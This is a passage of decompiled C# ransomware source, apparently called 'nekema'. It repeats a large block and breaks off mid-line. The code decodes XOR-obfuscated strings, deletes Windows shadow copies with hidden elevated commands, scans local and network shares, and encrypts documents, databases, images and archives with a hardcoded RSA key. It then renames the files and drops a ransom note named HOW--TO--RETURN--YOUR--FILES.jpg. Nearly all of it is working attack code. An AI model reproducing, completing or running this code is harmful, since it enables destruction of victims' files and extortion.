<Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new 